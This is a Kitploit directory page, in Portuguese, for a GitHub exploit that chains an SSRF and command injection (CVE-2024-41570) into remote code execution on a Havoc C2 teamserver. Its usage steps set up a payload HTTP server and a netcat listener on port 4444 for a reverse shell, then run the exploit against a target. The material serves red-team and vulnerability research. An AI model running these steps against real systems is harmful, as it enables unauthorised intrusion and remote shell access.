Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-41570-Havoc-C2-RCE — Este é um RCE encadeado no framework Havoc C2 usando os PoCs de github.com/chebuya e github.com/IncludeSecurity | Kitploit
Ferramentas/GitHubGitHub/leo-mitch/cve-2024-41570-havoc-c2-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed Teaming
GitHubleo-mitch/cve-2024-41570-havoc-c2-rce

CVE-2024-41570-Havoc-C2-RCE

Este é um RCE encadeado no framework Havoc C2 usando os PoCs de github.com/chebuya e github.com/IncludeSecurity

Ver Repositório
36há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Havoc-C2-RCE (CVE-2024-41570)

Este é um RCE encadeado (CVE-2024-41570) no framework Havoc C2.

Injeção de comandos: o Havoc é vulnerável a injeção de comandos, permitindo que um usuário autenticado execute comandos no Teamserver. Afeta as versões 0.3 até a versão mais recente, a 0.6. O perfil padrão do Havoc contém senhas embutidas (hardcoded); portanto, um operador de C2 descuidado o suficiente para usar o perfil padrão em uma rede pública pode ser imediatamente explorado.

SSRF: essa vulnerabilidade é explorada por meio de falsificação (spoofing) do registro e check-ins de um agente demon para abrir um socket TCP no teamserver e ler/gravar dados a partir dele. Isso permite que atacantes vazem os IPs de origem dos teamservers e muito mais.

Encadeamento: abusar do SSRF para entregar um payload autenticado de injeção de comandos.

Como usar

2025-01-19 20-01-34

1. Modify the IP, USER and PASSWORD in the exploit.py file.
2. Modify IP in payload.sh

-> python3 -m venv myenv && source myenv/bin/activate
-> pip3 install -r requirements.txt
-> chmox +x payload.sh
-> python3 -m http.server (On another terminal)
-> nc -lvnp 4444 (On another terminal)

# Run the exploit
(myenv) -> python3 exploit.py -t https://site.com -i 0.0.0.0 -p 12345

Créditos a @chebuya e @Hyperreality

Baixar ferramenta